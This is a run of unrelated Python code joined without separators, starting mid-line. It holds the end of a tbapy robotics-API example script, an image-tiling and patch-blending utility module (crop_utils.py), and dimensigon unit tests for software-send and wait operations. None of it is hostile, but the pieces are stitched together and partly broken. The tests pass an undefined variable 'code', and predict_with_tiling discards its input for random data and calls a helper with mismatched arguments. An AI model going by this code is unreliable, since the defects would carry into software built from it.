% districts[-1].display_name) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match.predicted_time) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event.event_code for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot.robot_name, robot.year) for robot in robots)) print('Robots have attribute name:', hasattr(robots[0], 'name')) print('Robots have attribute robot_name:', hasattr(robots[0], 'robot_name')) print() print('-' * 8 + ' Dictionary Syntax' + '-' * 8) print('Team 254 is from %s in %s, %s.' % (team['city'], team['state_prov'], team['country'])) print('Team 1418 is/was in the %s district in the most recent year of competition.' % districts[-1]['display_name']) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match['predicted_time']) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event['event_code'] for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot['robot_name'], robot['year']) for robot in robots)) print('Robots have attribute name:', 'name' in robots[0]) print('Robots have attribute robot_name:', 'robot_name' in robots[0]) print() print('-' * 5 + ' .raw() Dictionary Syntax' + '-' * 5) print('Team 254 is from %s in %s, %s.' % (team.raw()['city'], team.raw()['state_prov'], team.raw()['country'])) print('Team 1418 is/was in the %s district in the most recent year of competition.' % districts[-1].raw()['display_name']) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match.raw()['predicted_time']) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event.raw()['event_code'] for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot.raw()['robot_name'], robot.raw()['year']) for robot in robots)) print('Robots have attribute name:', 'name' in robots[0].raw()) print('Robots have attribute robot_name:', 'robot_name' in robots[0].raw()) print() print('-' * 8 + ' If-Modified-Since Header ' + '-' * 8) def fetch_cached_value(): return [tbapy.District({ 'city': 'Falls Church', 'state_prov': 'Virginia', 'country': 'USA', 'cached': 'cached?' })] date_last = last_modified.date date_old = datetime.datetime.utcnow().replace(year=2015) districts = tba.team_districts(1418, if_modified_since=date_last) or fetch_cached_value() print(f'Recent date -- Was the cached value used? {districts[0].get("cached") is not None}') districts = tba.team_districts(1418, if_modified_since=date_old) or fetch_cached_value() print(f'Old date -- Was the cached value used? {districts[0].get("cached") is not None}') data_utils/crop_utils.py from operator import sub import sys import numpy as np import scipy.signal from torch.nn.modules.activation import LeakyReLU from config_args import parse_args import multiprocessing as mp import torch import torch.nn as nn cached_2d_windows = dict() def crop_frames(args, data): """ Indexing is done this way ################## # 1 # 2 # 3 # # 4 # 5 # 6 # ################# """ if args.num_features % (args.v_crop_scale * args.h_crop_scale) != 0: print("Incorrect Crop Scaling selected. 
Please ensure original dimension is divisible by crop ratio.") sys.exit() frames = [] # Split frames # In: batch, seq, dim, dim # Out: [batch, seq, dim/scale, dim] * scale h_frames = np.split(data, args.h_crop_scale, -2) # In: [batch, seq, dim/scale, dim] * scale for f in h_frames: frames += np.split(f, args.v_crop_scale, -1) frames = np.concatenate(frames, axis=0) return frames def fix_boundaries(args, predict_values): fix_idx = args.fix_boundary_len predict_values_fix = np.empty(shape=predict_values.shape) predict_values_fix[:, :, fix_idx:-fix_idx, fix_idx:-fix_idx] = \ predict_values[:, :, fix_idx:-fix_idx, fix_idx:-fix_idx] # Final dim: batch, samples, seq_len, 1 top_row_fix = predict_values[:, :, fix_idx, fix_idx:-fix_idx] top_row_fix = np.concatenate(([top_row_fix[:, :, 0][..., np.newaxis]] * fix_idx + [top_row_fix] + [top_row_fix[:, :, -1][..., np.newaxis]] * fix_idx), axis=-1) bot_row_fix = predict_values[:, :, -fix_idx, fix_idx:-fix_idx] bot_row_fix = np.concatenate(([bot_row_fix[:, :, 0][..., np.newaxis]] * fix_idx + [bot_row_fix] + [bot_row_fix[:, :, -1][..., np.newaxis]] * fix_idx), axis=-1) # Final dim: batch, samples, seq_len, row_size left_col_fix = predict_values[:, :, fix_idx:-fix_idx, fix_idx] right_col_fix = predict_values[:, :, fix_idx:-fix_idx, -fix_idx] for i in range(fix_idx): predict_values_fix[:, :, i, :] = top_row_fix predict_values_fix[:, :, -(i+1), :] = bot_row_fix predict_values_fix[:, :, fix_idx:-fix_idx, i] = left_col_fix predict_values_fix[:, :, fix_idx:-fix_idx, -(i+1)] = right_col_fix return predict_values_fix def stitch_frames(args, z, each_frame, chunk_size): b = int(z.shape[0] / each_frame) y = np.empty((b, z.shape[1], args.xdim, args.ydim)) crop_frame = int(args.xdim / args.h_crop_scale) i = 0 for r in range(args.h_crop_scale): row = int(r * crop_frame) for c in range(args.v_crop_scale): col = int(c * crop_frame) for b in range(chunk_size): y[b, :, row:row + crop_frame, col:col + crop_frame] = z[i] i += 1 return y # This is a bit of hand wavy method since hdf5 is not so great at indexing, # and that comes at a cost of size and performance, so we do it heuristically def construct_frames(args, x, data_name, total_len): each_frame = int(args.v_crop_scale * args.h_crop_scale) chunk_frames = int(args.chunk_size * each_frame) chunk_size = args.chunk_size y = None chunk_idx = 0 # for chunk_idx in range(0, total_len, args.chunk_size): break_next = False # print(f'Total Length: {total_len}') while True: # print(f'Idx: {chunk_idx}') if chunk_idx + chunk_frames > total_len - 1: # print(f'Idx: {chunk_idx}, Check: {chunk_idx + chunk_frames}') chunk_size = int((total_len % chunk_frames) / each_frame) # print(f'Chunk Size: {chunk_size}') break_next = True elif chunk_idx + chunk_frames == total_len - 1: break z = np.concatenate([x[data_name][chunk_idx + i * chunk_size:chunk_idx + (i+1) * chunk_size] for i in range(each_frame)]) if args.fix_boundary: z = fix_boundaries(args, z) # chunk, seq_len, dim, dim if y is None: # print(f'Stitching: {z.shape} and C: {chunk_size}') y = stitch_frames(args, z, each_frame, chunk_size) else: # print(f'Stitching: {z.shape} and C: {chunk_size}') y = np.concatenate([y, stitch_frames(args, z, each_frame, chunk_size)]) chunk_idx += chunk_frames if break_next: break return y def undo_single_crop(args, h_pred): y = np.empty((1, h_pred.shape[1], args.xdim, args.ydim)) crop_frame = int(args.xdim / args.h_crop_scale) i = 0 for r in range(args.h_crop_scale): row = int(r * crop_frame) for c in range(args.v_crop_scale): col = int(c * crop_frame) 
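# copy cropped patch i back into its (row, col) cell of the reassembled frame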
y[0, :, row:row + crop_frame, col:col + crop_frame] = h_pred[i] i += 1 return y """ Overlap + Crop for Training """ # In: batch, seq, dim, dim def crop_overlap_frames(args, data): aug = int(round(args.window_size * (1 - 1.0/args.subdivisions))) more_borders = ((0, 0), (0, 0), (aug, aug), (aug, aug)) padded_img = np.pad(data, pad_width=more_borders, mode='reflect') step = int(args.window_size/args.subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] for i in range(0, padx_len-args.window_size+1, step): for j in range(0, padx_len-args.window_size+1, step): patch = padded_img[:, :, i:i+args.window_size, j:j+args.window_size] subdivs.append(patch) subdivs = np.concatenate(subdivs, axis=0) return subdivs """ Overlapping Technique to blend edges Used for Single Prediction https://github.com/Vooban/Smoothly-Blend-Image-Patches """ # Single Based def predict_tiles(pads, y_data, args, trainer): res_mean = [] res_std = [] for pad in pads: # For every rotation: sd_mean, sd_std = _windowed_subdivs(pad, y_data, args.window_size, args.subdivisions, trainer, args) # output - sub_div * batch, seq, dim + window_size * (1 - 1 / subdivisions), dim + window_size * (1 - 1 / subdivisions) one_padded_result_mean = _recreate_from_subdivs( sd_mean, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) one_padded_result_std = _recreate_from_subdivs( sd_std, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) res_mean.append(one_padded_result_mean) res_std.append(one_padded_result_std) return res_mean, res_std def _windowed_subdivs(padded_img, y_data, window_size, subdivisions, trainer, args): """ Create tiled overlapping patches. Returns: 5D numpy array of shape = ( nb_patches_along_X, nb_patches_along_Y, patches_resolution_along_X, patches_resolution_along_Y, nb_output_channels ) Note: patches_resolution_along_X == patches_resolution_along_Y == window_size """ WINDOW_SPLINE_2D = np.squeeze(_window_2D(window_size=window_size, power=2)) step = int(window_size/subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] # print(f'Input Shape for Subdivision: {padded_img.shape}') for i in range(0, padx_len-window_size+1, step): subdivs.append([]) for j in range(0, padx_len-window_size+1, step): patch = padded_img[:, :, i:i+window_size, j:j+window_size] subdivs[-1].append(patch) # Here, `gc.collect()` clears RAM between operations. # It should run faster if they are removed, if enough memory is available. 
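# Descriptive note: at this point `subdivs` is a nested [row][col] Python list of
# overlapping patches, each of shape (batch, seq, window_size, window_size); the
# np.array call below turns it into a 6-D array that is then flattened for batched
# inference and reshaped back after the spline-window weighting.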
# gc.collect() subdivs = np.array(subdivs) # print(f'Sub Division shape: {subdivs.shape}') # gc.collect() #a: list of sub-divisions (overlaps), b: batch, c: seq len, d: xdim, e: ydim a, b, c, d, e, f = subdivs.shape # subdivs = np.expand_dims(subdivs.reshape(a * b * c * d, e, f), -1) subdivs = subdivs.reshape(a * b * c, d, e, f) # print(f'Sub Division Shape Into Network: {subdivs.shape}') # print(f'Y Data Into Network: {y_data.shape}') # gc.collect() # print(subdivs.shape) subdivs = torch.as_tensor(subdivs, dtype=torch.float32) y_data = torch.as_tensor(y_data, dtype=torch.float32) pred = trainer.predict_one(subdivs, y_data, args.n_samples) subdivs_mean, subdivs_std = pred # print(f"Sub Mean Out N/W: {subdivs_mean.shape}, Std {subdivs_std.shape}") # subdivs = pred_func(subdivs) # gc.collect() # subdivs_mean = [s.reshape(s.shape[-2], s.shape[-1], 1) for s in subdivs_mean] # subdivs_std = [s.reshape(s.shape[-2], s.shape[-1]) for s in subdivs_std] subdivs_mean = np.array([patch * WINDOW_SPLINE_2D for patch in subdivs_mean]) subdivs_std = np.array([patch * WINDOW_SPLINE_2D for patch in subdivs_std]) # gc.collect() # Such 5D array: subdivs_mean = subdivs_mean.reshape(a, b, c, d, e, f) subdivs_std = subdivs_std.reshape(a, b, c, d, e, f) # print(f"Sub Mean Out After Window: {subdivs_mean.shape}, Std {subdivs_std.shape}") # gc.collect() return (subdivs_mean, subdivs_std) # # Batch Based # Bit of a handwavy where we only batch for inference and do a naive way for processing def predict_batch_tiles(pads, y_data, args, trainer): # Save shapes for reconstructing pad_shape = np.stack(pads).shape pad_b_len = pads[0].shape[0] # Returns list of subdivisions across all paddings # Shape of a * b * c, d, e, f for each pad with mp.Pool(args.data_proc_workers) as pool: subdvis, subdivs_shape = pool.map(_create_subdvis, [(pads, args.window_size, args.subdivisions)])[0] #subdvis, subdivs_shape = _create_subdvis(pads, args.window_size, args.subdivisions) # Stack subdivs into a batch and then performs prediction subdivs_mean, subdivs_std = _predict_batch_subdivs(subdvis, y_data, trainer, args) # Reconstruct it as a list as the same shape as input list and with mp.Pool(args.data_proc_workers) as pool: subdivs_mean = pool.map(_recreate_split_frames, [(subdivs_mean, pads, subdivs_shape, args)])[0] with mp.Pool(args.data_proc_workers) as pool: subdivs_std = pool.map(_recreate_split_frames, [(subdivs_std, pads, subdivs_shape, args)])[0] #subdivs_mean = _recreate_split_frames(subdivs_mean, pads, subdivs_shape, args) #subdivs_std = _recreate_split_frames(subdivs_std, pads, subdivs_shape, args) with mp.Pool(args.data_proc_workers) as pool: res_mean, res_std = pool.map(recreate_sub_div_lists, [(subdivs_mean, subdivs_std, args, pads)])[0] # for sd_mean in subdivs_mean: # one_padded_result_mean = _recreate_from_subdivs( # sd_mean, args.window_size, args.subdivisions, # padded_out_shape=list(pads[0].shape)) # res_mean.append(one_padded_result_mean) # for sd_std in subdivs_std: # one_padded_result_std = _recreate_from_subdivs( # sd_std, args.window_size, args.subdivisions, # padded_out_shape=list(pads[0].shape)) # res_std.append(one_padded_result_std) return res_mean, res_std def recreate_sub_div_lists(argv): subdivs_mean, subdivs_std, args, pads = argv res_mean = [] res_std = [] for sd_mean in subdivs_mean: one_padded_result_mean = _recreate_from_subdivs( sd_mean, args.window_size, args.subdivisions, padded_out_shape=list(pads[0].shape)) res_mean.append(one_padded_result_mean) for sd_std in subdivs_std: one_padded_result_std = 
_recreate_from_subdivs( sd_std, args.window_size, args.subdivisions, padded_out_shape=list(pads[0].shape)) res_std.append(one_padded_result_std) return (res_mean, res_std) def _create_subdvis(argv): pads, window_size, subdivisions = argv """ Create tiled overlapping patches. Returns: 5D numpy array of shape = ( nb_patches_along_X, nb_patches_along_Y, patches_resolution_along_X, patches_resolution_along_Y, nb_output_channels ) Note: patches_resolution_along_X == patches_resolution_along_Y == window_size """ subdivs_list = [] subdivs_shape_list = [] subdivs_patch_list = [] for padded_img in pads: step = int(window_size/subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] # print(f'Input Shape for Subdivision: {padded_img.shape}') for i in range(0, padx_len-window_size+1, step): subdivs.append([]) for j in range(0, padx_len-window_size+1, step): patch = padded_img[:, :, i:i+window_size, j:j+window_size] subdivs[-1].append(patch) # Here, `gc.collect()` clears RAM between operations. # It should run faster if they are removed, if enough memory is available. # gc.collect() subdivs = np.array(subdivs) # print(f'Sub Division shape: {subdivs.shape}') # gc.collect() #a: list of sub-divisions (overlaps), b: batch, c: seq len, d: xdim, e: ydim a, b, c, d, e, f = subdivs.shape # subdivs = np.expand_dims(subdivs.reshape(a * b * c * d, e, f), -1) subdivs = subdivs.reshape(a * b * c, d, e, f) # print(f'Sub Division Shape Into Network: {subdivs.shape}') # print(f'Y Data Into Network: {y_data.shape}') # gc.collect() # print(subdivs.shape) subdivs_list.append(subdivs) subdivs_shape_list.append((a, b, c, d, e, f)) return subdivs_list, subdivs_shape_list def _predict_batch_subdivs(subdivs, y_data, trainer, args): subdivs = np.concatenate(subdivs, axis=0) if subdivs.shape[0] > args.batch_size: subdivs = np.array_split(subdivs, subdivs.shape[0] // args.batch_size + 1) else: subdivs = [subdivs] y_data = torch.as_tensor(y_data, dtype=torch.float32) pred_mean_out = [] pred_std_out = [] for subdiv in subdivs: subdiv = torch.as_tensor(subdiv, dtype=torch.float32) pred_mean, pred_std = trainer.predict_one(subdiv, y_data, args.n_samples) pred_mean_out.append(pred_mean) pred_std_out.append(pred_std) return np.concatenate(pred_mean_out), np.concatenate(pred_std_out) def _recreate_split_frames(argv): subdivs_in, pads, subdivs_shape, args = argv i = 0 subdivs = np.split(subdivs_in, len(subdivs_shape)) # for pad in pads: # subdivs.append(subdivs_in[i:i + len(pad)]) # i += len(pad) WINDOW_SPLINE_2D = np.squeeze(_window_2D(window_size=args.window_size, power=2)) out = [] for i, subdiv in enumerate(subdivs): a, b, c, d, e, f = subdivs_shape[i] subdiv = np.array([patch * WINDOW_SPLINE_2D for patch in subdiv]) out.append(subdiv.reshape(a, b, c, d, e, f)) return out # Weighting Technique def _spline_window(window_size, power=2): """ Squared spline (power=2) window function: https://www.wolframalpha.com/input/?i=y%3Dx**2,+y%3D-(x-2)**2+%2B2,+y%3D(x-4)**2,+from+y+%3D+0+to+2 """ intersection = int(window_size/4) wind_outer = (abs(2*(scipy.signal.triang(window_size))) ** power)/2 wind_outer[intersection:-intersection] = 0 wind_inner = 1 - (abs(2*(scipy.signal.triang(window_size) - 1)) ** power)/2 wind_inner[:intersection] = 0 wind_inner[-intersection:] = 0 wind = wind_inner + wind_outer wind = wind / np.average(wind) return wind def _window_2D(window_size, power=2): """ Make a 1D window function, then infer and return a 2D window function. 
Done with an augmentation, and self multiplication with its transpose. Could be generalized to more dimensions. """ # Memoization global cached_2d_windows key = "{}_{}".format(window_size, power) if key in cached_2d_windows: wind = cached_2d_windows[key] else: wind = _spline_window(window_size, power) # print(f'Spline Window Shape: {wind.shape}') wind = np.expand_dims(np.expand_dims(wind, 1), 1) wind = wind * wind.transpose(1, 0, 2) # if PLOT_PROGRESS: # # For demo purpose, let's look once at the window: # plt.imshow(wind[:, :, 0], cmap="viridis") # plt.title("Windowing Function (2D) 32x32 used for blending \n" # " the overlapping patches (Interpolation)") # plt.show() cached_2d_windows[key] = wind return wind # Generate Mirror Padded Image First def _pad_img(img, window_size, subdivisions): """ Add borders to img for a "valid" border pattern according to "window_size" and "subdivisions". Image is an np array of shape (x, y, nb_channels). """ aug = int(round(window_size * (1 - 1.0/subdivisions))) more_borders = ((0, 0), (0, 0), (aug, aug), (aug, aug)) ret = np.pad(img, pad_width=more_borders, mode='reflect') # gc.collect() return ret def _unpad_img(padded_img, window_size, subdivisions): """ Undo what's done in the `_pad_img` function. Image is an np array of shape (x, y, nb_channels). """ aug = int(round(window_size * (1 - 1.0/subdivisions))) ret = padded_img[ :, :, aug:-aug, aug:-aug ] # gc.collect() return ret def _rotate_mirror_do(im): """ Duplicate an np array (image) of shape (x, y, nb_channels) 8 times, in order to have all the possible rotations and mirrors of that image that fits the possible 90 degrees rotations. It is the D_4 (D4) Dihedral group: https://en.wikipedia.org/wiki/Dihedral_group """ mirrs = [] mirrs.append(np.array(im)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=1)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=2)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=3)) im = np.array(im)[:, :, :, ::-1] mirrs.append(np.array(im)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=1)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=2)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=3)) # mirrs = np.concatenate(mirrs, axis=0) return mirrs def _rotate_mirror_undo(im_mirrs): """ merges a list of 8 np arrays (images) of shape (x, y, nb_channels) generated from the `_rotate_mirror_do` function. Each images might have changed and merging them implies to rotated them back in order and average things out. It is the D_4 (D4) Dihedral group: https://en.wikipedia.org/wiki/Dihedral_group """ origs = [] origs.append(np.array(im_mirrs[0])) origs.append(np.rot90(np.array(im_mirrs[1]), axes=(-2, -1), k=3)) origs.append(np.rot90(np.array(im_mirrs[2]), axes=(-2, -1), k=2)) origs.append(np.rot90(np.array(im_mirrs[3]), axes=(-2, -1), k=1)) origs.append(np.array(im_mirrs[4])[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[5]), axes=(-2, -1), k=3)[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[6]), axes=(-2, -1), k=2)[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[7]), axes=(-2, -1), k=1)[:, :, :, ::-1]) return np.mean(origs, axis=0) def _recreate_from_subdivs(subdivs, window_size, subdivisions, padded_out_shape): """ Merge tiled overlapping patches smoothly. 
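Each incoming patch has already been weighted by the 2-D spline window, so summing
the overlapping patches into `y` and dividing by subdivisions ** 2 reconstructs a
smoothly blended output of shape `padded_out_shape`.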
""" step = int(window_size/subdivisions) padx_len = padded_out_shape[-2] pady_len = padded_out_shape[-1] y = np.zeros(padded_out_shape) # print(y.shape) # print(subdivs.shape) a = 0 for i in range(0, padx_len-window_size+1, step): b = 0 for j in range(0, padx_len-window_size+1, step): windowed_patch = subdivs[a, b] # print(windowed_patch.shape) y[:, :, i:i+window_size, j:j+window_size] = y[:, :, i:i+window_size, j:j+window_size] + windowed_patch b += 1 a += 1 return y / (subdivisions ** 2) def prep_overlap(argv): args, data = argv pad = _pad_img(data, args.window_size, args.subdivisions) #pads = _rotate_mirror_do(pad) pads = [pad] return pads def undo_overlap(argv): args, data = argv #data = _rotate_mirror_undo(data) prd = _unpad_img(data[0], args.window_size, args.subdivisions) prd = prd[:, :, :prd.shape[-2], :prd.shape[-1]] return prd # We will pass individual data to this to keep things simple # Then convert it torch tensors and back again def predict_with_tiling(args, data, pred_func): data = np.random.uniform(0, 1, size=(10, 4, 100, 100)) # Input: batch, seq, dim, dim # Mirror Pad images first # Adds 1/2 size of window_size pixels across the edges of the input image # to remove zero padding effects # Mirror Pad: batch, seq, dim + window_size * (1 - 1/subdivisions), dim + window_size * (1 - 1/subdivisions) pad = _pad_img(data, args.window_size, args.subdivisions) print(f'Pad Shape: {pad.shape}') # Rotates each image 4x times + Mirror and rotate for a total of 8x images returns as a list # Rotate Pad: 8, batch, seq, dim + window_size * (1 - 1/subdivisions), dim + window_size * (1 - 1/subdivisions) pads = _rotate_mirror_do(pad) print(f'Rotate Shape: {len(pads)}, and {pad[0].shape}') res = [] for pad in pads: # For every rotation: sd = _windowed_subdivs(pad, args.window_size, args.subdivisions, pred_func) # output - sub_div * batch, seq, dim + window_size * (1 - 1 / subdivisions), dim + window_size * (1 - 1 / subdivisions) one_padded_result = _recreate_from_subdivs( sd, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) res.append(one_padded_result) # Merge after rotations: padded_results = _rotate_mirror_undo(res) print(f'Final padded Shape: {padded_results.shape}') prd = _unpad_img(padded_results, args.window_size, args.subdivisions) print(f'Final Unpadded Shape: {prd.shape}') prd = prd[:, :, :data.shape[-2], :data.shape[-1]] print(f'Final Shape: {prd.shape}') return prd # # # if __name__ == '__main__': # args = parse_args() # predict_with_tiling(args, None, None) 1-10 import sqlite3 import sys import unittest from unittest import mock from unittest.case import TestCase from unittest.mock import Mock import flask import dimensigon.use_cases from dimensigon.domain.entities import ActionTemplate, Server, Software, SoftwareServerAssociation, Scope from dimensigon.domain.entities.bootstrap import set_initial from dimensigon.domain.entities.user import ROOT from dimensigon.use_cases.operations import RequestOperation, NativeWaitOperation, NativeSoftwareSendOperation from dimensigon.web import db, errors from dimensigon.web.network import Response from tests.base import FlaskAppMixin, TestDimensigonBase class Context: def __init__(self, env=None): self.env = env or {} class TestNativeSoftwareSendOperation(TestDimensigonBase): def setUp(self) -> None: super().setUp() self.context = Context(dict(executor_id=ROOT)) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') @mock.patch('dimensigon.use_cases.operations.ntwrk.post') def test_execute_send_software(self, mock_post, 
mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = Server('nodeA', port=5000) node2 = Server('nodeB', port=5000) ssa1 = SoftwareServerAssociation(software=soft, server=node1, path='/') ssa2 = SoftwareServerAssociation(software=soft, server=node2, path='/') ssa3 = SoftwareServerAssociation(software=soft, server=self.s1, path='/') db.session.add_all([soft, node1, node2, ssa1, ssa2, ssa3]) mock_post.return_value = Response(msg={'transfer_id': 1}, code=at.expected_rc) mock_get.return_value = Response(msg={ "route_list": [ { "cost": 0, "destination_id": f"{node1.id}", }, { "cost": 1, "destination_id": f"{self.s1.id}", } ], }, code=200, server=node2) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute( dict(input=dict(software=soft.id, server=node2.id, dest_path='dest', chunk_size=20, max_senders=2)), timeout=None, context=self.context) mock_post.assert_called_once_with(node1, 'api_1_0.send', json=dict(software_id=str(soft.id), dest_server_id=str(node2.id), background=False, include_transfer_data=True, force=True, dest_path='dest', chunk_size=20, max_senders=2), timeout=None, identity=ROOT) self.assertTrue(cp.success) self.assertEqual(flask.json.dumps(mock_post.return_value.msg), cp.stdout) def test_execute_send_software_no_software(self): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) with self.subTest("pass an invalid id"): soft_id = '00000000-0000-0000-0000-000000000001' cp = ro._execute(dict(input=dict(software=soft_id, server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"software id '{soft_id}' not found", cp.stderr) with self.subTest("pass an invalid name"): cp = ro._execute(dict(input=dict(software='software', server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"No software found for 'software'", cp.stderr) soft = Software(name='test', version="1", filename='test.zip') db.session.add(soft) with self.subTest("pass an invalid version"): cp = ro._execute(dict(input=dict(software='test', version="2.1", server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"No software found for 'test' and version '2.1'", cp.stderr) def test_execute_send_software_no_destination_server(self): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version='1', filename='test.zip') soft2 = Software(name='test', version='2', filename='test.zip') node1 = Server('nodeA', port=5000) ssa1 = SoftwareServerAssociation(software=soft2, server=node1, path='/') db.session.add_all([soft, soft2, node1, ssa1]) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software='test', server='a')), context=self.context) self.assertFalse(cp.success) self.assertEqual(f"destination server 'a' not found", cp.stderr) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') def test_execute_send_software_no_ssa(self, mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = 
Server('nodeA', port=5000) db.session.add_all([soft, node1]) mock_get.return_value = Response(code=400) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software=soft.id, server=self.s1.id)), context=self.context) self.assertFalse(cp.success) self.assertEqual(f'{soft.id} has no server association', cp.stderr) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') @mock.patch('dimensigon.use_cases.operations.ntwrk.post') def test_execute_send_software_error(self, mock_post, mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = Server('nodeA', port=5000) ssa1 = SoftwareServerAssociation(software=soft, server=node1, path='/') db.session.add_all([soft, node1, ssa1]) mock_post.return_value = Response(msg={'error': 'message'}, code=400) mock_get.return_value = Response(code=400) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software=str(soft.id), server=str(node1.id))), timeout=10, context=self.context) mock_post.assert_called_once_with(node1, 'api_1_0.send', json=dict(software_id=str(soft.id), dest_server_id=str(node1.id), background=False, include_transfer_data=True, force=True), timeout=10, identity=ROOT) self.assertFalse(cp.success) self.assertEqual(flask.json.dumps(mock_post.return_value.msg), cp.stdout) class TestNativeWaitOperation(FlaskAppMixin, TestCase): def setUp(self): super().setUp() set_initial(action_template=True) self.at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000002') self.nwo = NativeWaitOperation(code=code, system_kwargs=dict(sleep_time=0)) self.patcher_lock_scope = mock.patch('dimensigon.use_cases.operations.lock_scope', autospec=True) self.patcher_db = mock.patch('dimensigon.use_cases.operations.db') self.mock_db = self.patcher_db.start() self.mock_lock_scope = self.patcher_lock_scope.start() m = self.mock_db.session.query.return_value = Mock() mm = m.filter.return_value = Mock() self.mmm = mm.filter.return_value = Mock() def tearDown(self) -> None: super().tearDown() self.patcher_lock_scope.stop() self.patcher_db.stop() def test_server_found(self): self.mmm.all.side_effect = [[], [('node1',)]] cp = self.nwo._execute(dict(input=dict(server_names=['node1'])), context=Mock()) self.assertEqual(f"Server node1 found", cp.stdout) self.assertTrue(cp.success) def test_server_notfound(self): self.mmm.all.reset_mock() self.mmm.all.return_value = [] self.mmm.all.side_effect = None cp = self.nwo._execute(dict(input=dict(server_names='node1', timeout=0.01)), context=Mock()) self.assertEqual(f"Server node1 not created after 0.01 seconds", cp.stderr) self.assertFalse(cp.success) def test_wait_multiple_servers(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None self.mmm.all.side_effect = [[('node1',)], sqlite3.OperationalError('database is locked'), []] with mock.patch('dimensigon.use_cases.operations.time.time') as mock_time: mock_time.side_effect = [0, 1, 2, 3] cp = self.nwo._execute(dict(input=dict(server_names=['node1', 'node2', 'node3'], timeout=3)), context=Mock()) self.assertEqual(f"Servers node2, node3 not created after 3 seconds", cp.stderr) self.assertFalse(cp.success) def test_no_server_provided(self): cp = self.nwo._execute(dict(input=dict(server_names=[])), context=Mock()) self.assertEqual(f"No server to 
wait", cp.stderr) self.assertFalse(cp.success) def test_sqlite_error(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None self.mmm.all.side_effect = [sqlite3.OperationalError(), sqlite3] with mock.patch('dimensigon.use_cases.operations.time.time') as mock_time: mock_time.side_effect = [0, 1, 2] with self.assertRaises(sqlite3.OperationalError): cp = self.nwo._execute(dict(input=dict(server_names=['node1', 'node2', 'node3'])), context=Mock()) def test_lock_error(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None e = errors.LockError(Scope.CATALOG, action='lock', responses=[]) self.mock_lock_scope.side_effect = [e] cp = self.nwo._execute(dict(input=dict(server_names='node1')), context=Mock()) self.assertEqual(str(e), cp.stderr) self.assertFalse(cp.success) # class TestRequestOperation(TestCase): # def setUp(self): # """Create and configure a new app instance for each test.""" # # create the app with common test config # self.app = create_app('test') # self.app_context = self.app.app_context() # self.app_context.push() # self.client = self.app.test_client() # db.create_all() # set_initial(user=True, action_template=True) # self.server = Server.get_current() # self.auth = HTTPBearerAuth(create_access_token(User.get_by_name('root').id)) # # @responses.activate # def test_execute_request(self): # url = 'http://new.url/' # content = {"content": "this is a message"} # responses.add(method='GET', url=url, body=json.dumps(content), status=200, # content_type='application/json') # # ro = RequestOperation('{"method":"get", "url":"{{view_or_url}}"}', # expected_stdout='{}', # expected_stderr='', # expected_rc=200, # post_code="params.update(response.json())") # # params = {"view_or_url": url} # cp = ro.execute(context=params, timeout=None) # # self.assertTrue(cp.success) # self.assertDictEqual({**params, **content}, params) # # @responses.activate # def test_execute_request_timeout(self): # url = 'http://new.url/' # content = {"content": "this is a message"} # responses.add(method='GET', url=url, body=TimeoutError()) # # ro = RequestOperation('{"method":"get", "url":"{{url}}"}', # expected_stdout='{}', # expected_stderr='', # expected_rc=200 # ) # # params = {"url": url} # cp = ro.execute(params, timeout=None) # # self.assertFalse(cp.success) # 